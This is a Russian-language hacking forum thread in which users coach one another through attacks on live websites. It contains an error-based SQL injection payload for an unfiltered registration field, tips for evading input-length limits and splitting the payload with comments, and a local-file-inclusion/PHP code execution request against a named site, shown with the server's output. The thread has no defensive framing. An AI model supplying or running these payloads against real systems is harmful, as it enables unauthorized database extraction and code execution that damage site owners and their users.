 |
|
15.03.2012, 13:43
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от CheatXX
подскажите, есть регистрация на сайте,одно из полей не фильтруется, что можно сделать?
ввел например туда '1 и он ошибку вывел
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1', ''1', '0',0)' at line 1
Вывести данные из базы, в ошибке, вбив в не фильтруемое поле:
' and (select 1 from(select count(*), concat(version(), 0x00, floor(rand(0)*2))x РЕАЛЬНАЯ_ТАБЛИЦА group by x)a) or '
|
|
|
15.03.2012, 13:54
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 2
С нами:
8908056
Репутация:
0
|
|
там ограничение 40 символов к сожалению
там два поля идет уязвимых,
там идет первое поле 40 символов, второе поле 40 символов, '0', 0); т.е так скорей всего
'тут первое поле','тут второе','0',0);
в скрипте ограничение
|
|
|
|
15.03.2012, 13:55
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от CheatXX
там ограничение 40 символов к сожалению
ограничение где именно? в форме, или в обрабатываемом скрипте?
если первое, то легко обходится, посылкой собственного запроса
второе к сожалению не обойти
|
|
|
|
15.03.2012, 13:58
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от CheatXX
там ограничение 40 символов к сожалению
Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
|
|
|
|
15.03.2012, 14:00
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Попробуй разделить запрос как-то =)
|
|
|
|
15.03.2012, 14:01
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 2
С нами:
8908056
Репутация:
0
|
|
Сообщение от mix0x0
Попробуй, используя оперу изменить исходный код поля, тем самым убрать ограничение на кол-во символов.
в самом скрипте ограничение
|
|
|
|
15.03.2012, 14:02
|
|
Познающий
Регистрация: 03.05.2011
Сообщений: 30
С нами:
7909526
Репутация:
1
|
|
запрос выглядит как:
site.ru/generat1.php?src=sitefotos/sitefotos_13153512082010.jpg
при подмене на
site.ru/generat1.php?src=site.ru/1.gif выводит картинку.. скрипты и т д не исполняет... что делать?
|
|
|
|
15.03.2012, 14:03
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
CheatXX, попробуй так разделить запросы например
Сообщение от None
' and (select 1 from(select /*
*/count(*), concat(version(), 0x00,/*
*/ floor(rand(0)*2))x /*
*/РЕАЛЬНАЯ_ТАБЛИЦА /*
*/group by x)a) or '
,
ничего кроме раскрытия пути ты не получишь думаю. |
|
|
|
15.03.2012, 14:15
|
|
Новичок
Регистрация: 08.06.2009
Сообщений: 2
С нами:
8908056
Репутация:
0
|
|
Сообщение от Ereee
CheatXX, попробуй так разделить запросы например
там 140 символов получается, а два поля дают только 80) может кто то сайт посмотреть ? ссылку в лс скину
еше 1 поле есть, ограничения нет но выдает:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'accounts group by x)a) or '',0)' at line 1
|
|
|
|
15.03.2012, 18:02
|
|
Новичок
Регистрация: 17.03.2008
Сообщений: 5
С нами:
9553063
Репутация:
1
|
|
LFI
Сообщение от Expl0ited
Выполнение PHP кода:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
Вернет:
/bin/apache2___[zamok-met.ru] GET /catalog.php?id=../../../../proc/self/cmdline%00&
Linux cabol.beget.ru 2.6.35.14 #4 SMP Sun Aug 14 23:30:33 MSD 2011 x86_64
HTTP/1.0
Запрос отправлять не через браузер, иначе все символы урлкодируются.
Руки и голова
А при каких условиях пхп кода и настроек апача удаеться провести такой финт с выполнением пхп кода:
Код:
http://zamok-met.ru/catalog.php?id=../../../../proc/self/cmdline%00&
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
